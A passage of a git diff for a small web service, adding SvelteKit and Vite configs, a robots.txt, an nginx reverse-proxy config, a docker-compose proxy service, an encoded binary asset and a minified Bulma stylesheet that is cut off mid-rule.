z`%zNy>|2qU|BgM#NF^MZ>dO4MuiiHuIeu(C+xA?IYXyX58OQQHURRgvt&gQ_5P#I3 zIJn`JA>arfL}I7KN-k-G7jFF>;^|coWEuP>1Jol+>$%T?#P6SZy|$Q%l3LAo6mp3X zS2G!W{tC_c#-4qF@bX@fjgz+<^XJJ11t{E`4eCwn8)!69WBwR4K_OveqySMyO|opNj_R+>WH|q!Na}&A*o!WhTrT+aZ;_*qhmu-tsGAq z68=LJoL4~vAxOl-3t#XYEjiZWf3KJ9LJ!|R?=CEGY`$DTcl(FVf|H5CLwhgu09Vx6 zJh7=Gfj!y}EEKZiV<$g(g060ZcD}n%`L)7qU@j8l+3Hsi_r|@bLSZCbZxLcKL(8oN zz2*G7f_LB9sDo}ZA@Ro>8(jk~&P6qssY8ceR}yA;I%B=VgrGm2Dphwucp)mZO_xpy zNCJG^%2A{0mHPDCxNzI z2^RB46Unz7u&T^m8z-gIYg6vWxIh@&n!h7#g@u|^`GY?&<8pEUX=$W>NdIFNAwx}# z{$hh3f^gAcl8xWu>F0BO>uW+BB}98*>i$l(4m& ze^TScoJxxcWUO!G)B?JWDb?~SE%vAz7%Oewxc05Cj>g8oLUCN3%h#bk5qlB#_4tL~ z{RACpVjK%}V7&Xi#)VG#W-Q-fxj%+Qg}ot6w0vg5_-G<2y&;2;#u$JDYXAMnpfpVF zm~UUcd@@1T{z`6nD6+#}uw#O}+!cxrW(aLGCkwzbYw<&FPFUe|D-@^PLyDKPS}IZv-z1Y<=<>WALEcWn?is8?xc#w zMJgkWZ6C;M9{h)qTpB-hVNWs;=r8^>J2MhD^or5`>@`sH-J1wMhRa5V2{1WfTj1wF z&$TyvM?-?k?TY$v155F>xSN;Hk6wqQ<~l!E-CKeFG%}#WbO0+;j|x6&*bP!YZ!K;NfYisa~7e@=t-w_J5KthflG%oI#U&B^yvi(*eKyeylHVj#ZT% zZS(eQuCbw{ON>Hw(t~`rd1R#?!|}}$Xg3RfP{qAc2$C%Km{oMiAPlezXl#I0wJUr+HqE2pK?tM)Z`*-e_LkNZ zE6FrF4cj+Aj5dzOtlO>G#J)K?1?cvi);QbW`t-c+(4fj|{NNxyagyDsexp_@tdXRK zE6eLf(ON8cjxCSQ8I>;Qn(6r)ks(7rKQ;L8YX9!(;^|qXkT++9ApAB&@(&?Lve*q8fi!sHzEADW;cS(VD%qtM!zlsoxHf(+80+wp;$K$EuNtv z-iROv%1hmw1Ed440AILo6BMQfl!w-->wkJ+P12TF-f)aq?+CLE1Q~DzP$|QtrKGg6 ziAM2*D`v9eM@`mZhA*Asm_3BJQOd3gZ6TZqnDifW70SIr+Cl@?iRBpB^pzpRrO_1= zLFMep#iWzBGQ+$>=gfQy5Ro0XG`m4i>4gHwo`M~F+1nS(=!gX276sQLc_I68xDt$hDK0RI04 z%pAd~!vLTD&l@~!9WC8G%p6_*Uknf5|6-m_se56V5C37boUJ^(&D<;j-rnA9wodl$ c7G^G%Y|d`hd4EMnU=INlWz}RFq)fy92P;=*o&W#< literal 0 HcmV?d00001 diff --git a/internal/explorers-front/static/robots.txt b/internal/explorers-front/static/robots.txt new file mode 100644 index 0000000..e9e57dc --- /dev/null +++ b/internal/explorers-front/static/robots.txt @@ -0,0 +1,3 @@ +# https://www.robotstxt.org/robotstxt.html +User-agent: * +Disallow: diff --git a/internal/explorers-front/svelte.config.js b/internal/explorers-front/svelte.config.js new file mode 100644 index 0000000..c79d8d2 --- /dev/null +++ b/internal/explorers-front/svelte.config.js @@ -0,0 +1,17 @@ +import adapter from '@sveltejs/adapter-static'; + +/** @type {import('@sveltejs/kit').Config} */ +const config = { + kit: { + // adapter-auto only supports some environments, see https://kit.svelte.dev/docs/adapter-auto for a list. + // If your environment is not supported or you settled on a specific environment, switch out the adapter. + // See https://kit.svelte.dev/docs/adapters for more information about adapters. + adapter: adapter({ + fallback: 'index.html' // may differ from host to host + }) + } +}; + +export default config; + + diff --git a/internal/explorers-front/vite.config.js b/internal/explorers-front/vite.config.js new file mode 100644 index 0000000..bbf8c7d --- /dev/null +++ b/internal/explorers-front/vite.config.js @@ -0,0 +1,6 @@ +import { sveltekit } from '@sveltejs/kit/vite'; +import { defineConfig } from 'vite'; + +export default defineConfig({ + plugins: [sveltekit()] +}); diff --git a/services/explorers/conf/app.conf b/services/explorers/conf/app.conf new file mode 100644 index 0000000..03b3607 --- /dev/null +++ b/services/explorers/conf/app.conf @@ -0,0 +1,24 @@ +server { + listen 8000; + + server_name default; + + location /api { + client_max_body_size 50M; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_pass http://app:8000; + } + + location / { + gzip on; + gzip_static on; + gzip_types text/plain text/css text/javascript application/javascript; + gzip_disable "msie6"; + root /front/build; + try_files $uri $uri/ /index.html; + autoindex off; + } + +} \ No newline at end of file diff --git a/services/explorers/docker-compose.yml b/services/explorers/docker-compose.yml index ebe8f59..a0a0519 100644 --- a/services/explorers/docker-compose.yml +++ b/services/explorers/docker-compose.yml @@ -1,9 +1,18 @@ services: - app: - build: . + proxy: + image: nginx:1.25-alpine ports: - "8000:8000" restart: unless-stopped + volumes: + - ./conf/app.conf:/etc/nginx/conf.d/default.conf + - ./front/build:/front/build + depends_on: + - app + + app: + build: . + restart: unless-stopped cpus: 2 pids_limit: 256 diff --git a/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css b/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css new file mode 100644 index 0000000..9c4b389 --- /dev/null +++ b/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css @@ -0,0 +1 @@ +/*! bulma.io v0.9.4 | MIT License | github.com/jgthms/bulma */.button,.input,.textarea,.select select,.file-cta,.file-name,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:focus,.input:focus,.textarea:focus,.select select:focus,.file-cta:focus,.file-name:focus,.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus,.pagination-ellipsis:focus,.is-focused.button,.is-focused.input,.is-focused.textarea,.select select.is-focused,.is-focused.file-cta,.is-focused.file-name,.is-focused.pagination-previous,.is-focused.pagination-next,.is-focused.pagination-link,.is-focused.pagination-ellipsis,.button:active,.input:active,.textarea:active,.select select:active,.file-cta:active,.file-name:active,.pagination-previous:active,.pagination-next:active,.pagination-link:active,.pagination-ellipsis:active,.is-active.button,.is-active.input,.is-active.textarea,.select select.is-active,.is-active.file-cta,.is-active.file-name,.is-active.pagination-previous,.is-active.pagination-next,.is-active.pagination-link,.is-active.pagination-ellipsis{outline:none}.button[disabled],.input[disabled],.textarea[disabled],.select select[disabled],.file-cta[disabled],.file-name[disabled],.pagination-previous[disabled],.pagination-next[disabled],.pagination-link[disabled],.pagination-ellipsis[disabled],fieldset[disabled] .button,fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .pagination-previous,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-ellipsis{cursor:not-allowed}.button,.file,.breadcrumb,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis,.tabs,.is-unselectable{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.select:not(.is-multiple):not(.is-loading):after,.navbar-link:not(.is-arrowless):after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.box:not(:last-child),.content:not(:last-child),.notification:not(:last-child),.progress:not(:last-child),.table:not(:last-child),.table-container:not(:last-child),.title:not(:last-child),.subtitle:not(:last-child),.block:not(:last-child),.breadcrumb:not(:last-child),.level:not(:last-child),.message:not(:last-child),.pagination:not(:last-child),.tabs:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-moz-appearance:none;-webkit-appearance:none;background-color:#0a0a0a33;border:none;border-radius:9999px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:none;position:relative;vertical-align:top;width:20px}.delete:before,.modal-close:before,.delete:after,.modal-close:after{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete:before,.modal-close:before{height:2px;width:50%}.delete:after,.modal-close:after{height:50%;width:2px}.delete:hover,.modal-close:hover,.delete:focus,.modal-close:focus{background-color:#0a0a0a4d}.delete:active,.modal-close:active{background-color:#0a0a0a66}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading:after,.loader,.select.is-loading:after,.control.is-loading:after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:9999px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio,.modal,.modal-background,.is-overlay,.hero-video{bottom:0;left:0;position:absolute;right:0;top:0}.navbar-burger{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0}/*! minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */html,body,p,ol,ul,li,dl,dt,dd,blockquote,figure,fieldset,legend,textarea,pre,iframe,hr,h1,h2,h3,h4,h5,h6{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:inherit}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,optgroup,select,textarea{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#485fc7;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#da1039;font-size:.875em;font-weight:400;padding:.25em .5em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:inherit}table th{color:#363636}@-webkit-keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{0%{transform:rotate(0)}to{transform:rotate(359deg)}}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #0a0a0a05;color:#4a4a4a;display:block;padding:1.25rem}a.box:hover,a.box:focus{box-shadow:0 .5em 1em -.125em #0a0a0a1a,0 0 0 1px #485fc7}a.box:active{box-shadow:inset 0 1px 2px #0a0a0a33,0 0 0 1px #485fc7}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-small,.button .icon.is-medium,.button .icon.is-large{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button:hover,.button.is-hovered{border-color:#b5b5b5;color:#363636}.button:focus,.button.is-focused{border-color:#485fc7;color:#363636}.button:focus:not(:active),.button.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button:active,.button.is-active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text:hover,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text.is-focused{background-color:#f5f5f5;color:#363636}.button.is-text:active,.button.is-text.is-active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-ghost{background:none;border-color:transparent;color:#485fc7;text-decoration:none}.button.is-ghost:hover,.button.is-ghost.is-hovered{color:#485fc7;text-decoration:underline}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white:hover,.button.is-white.is-hovered{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white:focus,.button.is-white.is-focused{border-color:transparent;color:#0a0a0a}.button.is-white:focus:not(:active),.button.is-white.is-focused:not(:active){box-shadow:0 0 0 .125em #ffffff40}.button.is-white:active,.button.is-white.is-active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:#fff;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted:hover,.button.is-white.is-inverted.is-hovered{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined:hover,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined.is-focused{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading:after{border-color:transparent transparent white white!important}.button.is-white.is-outlined.is-loading:hover:after,.button.is-white.is-outlined.is-loading.is-hovered:after,.button.is-white.is-outlined.is-loading:focus:after,.button.is-white.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined:hover,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined.is-focused{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading:hover:after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-white.is-inverted.is-outlined.is-loading:focus:after,.button.is-white.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black:hover,.button.is-black.is-hovered{background-color:#040404;border-color:transparent;color:#fff}.button.is-black:focus,.button.is-black.is-focused{border-color:transparent;color:#fff}.button.is-black:focus:not(:active),.button.is-black.is-focused:not(:active){box-shadow:0 0 0 .125em #0a0a0a40}.button.is-black:active,.button.is-black.is-active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:#0a0a0a;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted:hover,.button.is-black.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined:hover,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined.is-focused{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading:hover:after,.button.is-black.is-outlined.is-loading.is-hovered:after,.button.is-black.is-outlined.is-loading:focus:after,.button.is-black.is-outlined.is-loading.is-focused:after{border-color:transparent transparent white white!important}.button.is-black.is-outlined[disabled],fieldset[disabled] .button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-black.is-inverted.is-outlined:hover,.button.is-black.is-inverted.is-outlined.is-hovered,.button.is-black.is-inverted.is-outlined:focus,.button.is-black.is-inverted.is-outlined.is-focused{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-outlined.is-loading:hover:after,.button.is-black.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-black.is-inverted.is-outlined.is-loading:focus:after,.button.is-black.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-black.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-light{background-color:#f5f5f5;border-color:transparent;color:#000000b3}.button.is-light:hover,.button.is-light.is-hovered{background-color:#eee;border-color:transparent;color:#000000b3}.button.is-light:focus,.button.is-light.is-focused{border-color:transparent;color:#000000b3}.button.is-light:focus:not(:active),.button.is-light.is-focused:not(:active){box-shadow:0 0 0 .125em #f5f5f540}.button.is-light:active,.button.is-light.is-active{background-color:#e8e8e8;border-color:transparent;color:#000000b3}.button.is-light[disabled],fieldset[disabled] .button.is-light{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none}.button.is-light.is-inverted{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted:hover,.button.is-light.is-inverted.is-hovered{background-color:#000000b3}.button.is-light.is-inverted[disabled],fieldset[disabled] .button.is-light.is-inverted{background-color:#000000b3;border-color:transparent;box-shadow:none;color:#f5f5f5}.button.is-light.is-loading:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;color:#f5f5f5}.button.is-light.is-outlined:hover,.button.is-light.is-outlined.is-hovered,.button.is-light.is-outlined:focus,.button.is-light.is-outlined.is-focused{background-color:#f5f5f5;border-color:#f5f5f5;color:#000000b3}.button.is-light.is-outlined.is-loading:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-outlined.is-loading:hover:after,.button.is-light.is-outlined.is-loading.is-hovered:after,.button.is-light.is-outlined.is-loading:focus:after,.button.is-light.is-outlined.is-loading.is-focused:after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-light.is-outlined[disabled],fieldset[disabled] .button.is-light.is-outlined{background-color:transparent;border-color:#f5f5f5;box-shadow:none;color:#f5f5f5}.button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;color:#000000b3}.button.is-light.is-inverted.is-outlined:hover,.button.is-light.is-inverted.is-outlined.is-hovered,.button.is-light.is-inverted.is-outlined:focus,.button.is-light.is-inverted.is-outlined.is-focused{background-color:#000000b3;color:#f5f5f5}.button.is-light.is-inverted.is-outlined.is-loading:hover:after,.button.is-light.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-light.is-inverted.is-outlined.is-loading:focus:after,.button.is-light.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent whitesmoke whitesmoke!important}.button.is-light.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-light.is-inverted.is-outlined{background-color:transparent;border-color:#000000b3;box-shadow:none;color:#000000b3}.button.is-dark{background-color:#363636;border-color:transparent;color:#fff}.button.is-dark:hover,.button.is-dark.is-hovered{background-color:#2f2f2f;border-color:transparent;color:#fff}.button.is-dark:focus,.button.is-dark.is-focused{border-color:transparent;color:#fff}.button.is-dark:focus:not(:active),.button.is-dark.is-focused:not(:active){box-shadow:0 0 0 .125em #36363640}.button.is-dark:active,.button.is-dark.is-active{background-color:#292929;border-color:transparent;color:#fff}.button.is-dark[disabled],fieldset[disabled] .button.is-dark{background-color:#363636;border-color:#363636;box-shadow:none}.button.is-dark.is-inverted{background-color:#fff;color:#363636}.button.is-dark.is-inverted:hover,.button.is-dark.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-dark.is-inverted[disabled],fieldset[disabled] .button.is-dark.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#363636}.button.is-dark.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined{background-color:transparent;border-color:#363636;color:#363636}.button.is-dark.is-outlined:hover,.button.is-dark.is-outlined.is-hovered,.button.is-dark.is-outlined:focus,.button.is-dark.is-outlined.is-focused{background-color:#363636;border-color:#363636;color:#fff}.button.is-dark.is-outlined.is-loading:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-outlined.is-loading:hover:after,.button.is-dark.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-outlined.is-loading:focus:after,.button.is-dark.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-dark.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-outlined{background-color:transparent;border-color:#363636;box-shadow:none;color:#363636}.button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-dark.is-inverted.is-outlined:hover,.button.is-dark.is-inverted.is-outlined.is-hovered,.button.is-dark.is-inverted.is-outlined:focus,.button.is-dark.is-inverted.is-outlined.is-focused{background-color:#fff;color:#363636}.button.is-dark.is-inverted.is-outlined.is-loading:hover:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-dark.is-inverted.is-outlined.is-loading:focus:after,.button.is-dark.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #363636 #363636!important}.button.is-dark.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-dark.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary{background-color:#00d1b2;border-color:transparent;color:#fff}.button.is-primary:hover,.button.is-primary.is-hovered{background-color:#00c4a7;border-color:transparent;color:#fff}.button.is-primary:focus,.button.is-primary.is-focused{border-color:transparent;color:#fff}.button.is-primary:focus:not(:active),.button.is-primary.is-focused:not(:active){box-shadow:0 0 0 .125em #00d1b240}.button.is-primary:active,.button.is-primary.is-active{background-color:#00b89c;border-color:transparent;color:#fff}.button.is-primary[disabled],fieldset[disabled] .button.is-primary{background-color:#00d1b2;border-color:#00d1b2;box-shadow:none}.button.is-primary.is-inverted{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted:hover,.button.is-primary.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-primary.is-inverted[disabled],fieldset[disabled] .button.is-primary.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#00d1b2}.button.is-primary.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;color:#00d1b2}.button.is-primary.is-outlined:hover,.button.is-primary.is-outlined.is-hovered,.button.is-primary.is-outlined:focus,.button.is-primary.is-outlined.is-focused{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.button.is-primary.is-outlined.is-loading:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-outlined.is-loading:hover:after,.button.is-primary.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-outlined.is-loading:focus:after,.button.is-primary.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-primary.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-outlined{background-color:transparent;border-color:#00d1b2;box-shadow:none;color:#00d1b2}.button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-primary.is-inverted.is-outlined:hover,.button.is-primary.is-inverted.is-outlined.is-hovered,.button.is-primary.is-inverted.is-outlined:focus,.button.is-primary.is-inverted.is-outlined.is-focused{background-color:#fff;color:#00d1b2}.button.is-primary.is-inverted.is-outlined.is-loading:hover:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-primary.is-inverted.is-outlined.is-loading:focus:after,.button.is-primary.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #00d1b2 #00d1b2!important}.button.is-primary.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-primary.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-primary.is-light{background-color:#ebfffc;color:#00947e}.button.is-primary.is-light:hover,.button.is-primary.is-light.is-hovered{background-color:#defffa;border-color:transparent;color:#00947e}.button.is-primary.is-light:active,.button.is-primary.is-light.is-active{background-color:#d1fff8;border-color:transparent;color:#00947e}.button.is-link{background-color:#485fc7;border-color:transparent;color:#fff}.button.is-link:hover,.button.is-link.is-hovered{background-color:#3e56c4;border-color:transparent;color:#fff}.button.is-link:focus,.button.is-link.is-focused{border-color:transparent;color:#fff}.button.is-link:focus:not(:active),.button.is-link.is-focused:not(:active){box-shadow:0 0 0 .125em #485fc740}.button.is-link:active,.button.is-link.is-active{background-color:#3a51bb;border-color:transparent;color:#fff}.button.is-link[disabled],fieldset[disabled] .button.is-link{background-color:#485fc7;border-color:#485fc7;box-shadow:none}.button.is-link.is-inverted{background-color:#fff;color:#485fc7}.button.is-link.is-inverted:hover,.button.is-link.is-inverted.is-hovered{background-color:#f2f2f2}.button.is-link.is-inverted[disabled],fieldset[disabled] .button.is-link.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#485fc7}.button.is-link.is-loading:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;color:#485fc7}.button.is-link.is-outlined:hover,.button.is-link.is-outlined.is-hovered,.button.is-link.is-outlined:focus,.button.is-link.is-outlined.is-focused{background-color:#485fc7;border-color:#485fc7;color:#fff}.button.is-link.is-outlined.is-loading:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-outlined.is-loading:hover:after,.button.is-link.is-outlined.is-loading.is-hovered:after,.button.is-link.is-outlined.is-loading:focus:after,.button.is-link.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #fff #fff!important}.button.is-link.is-outlined[disabled],fieldset[disabled] .button.is-link.is-outlined{background-color:transparent;border-color:#485fc7;box-shadow:none;color:#485fc7}.button.is-link.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-link.is-inverted.is-outlined:hover,.button.is-link.is-inverted.is-outlined.is-hovered,.button.is-link.is-inverted.is-outlined:focus,.button.is-link.is-inverted.is-outlined.is-focused{background-color:#fff;color:#485fc7}.button.is-link.is-inverted.is-outlined.is-loading:hover:after,.button.is-link.is-inverted.is-outlined.is-loading.is-hovered:after,.button.is-link.is-inverted.is-outlined.is-loading:focus:after,.button.is-link.is-inverted.is-outlined.is-loading.is-focused:after{border-color:transparent transparent #485fc7 #485fc7!important}.button.is-link.is-inverted.is-outlined[disabled],fieldset[disabled] 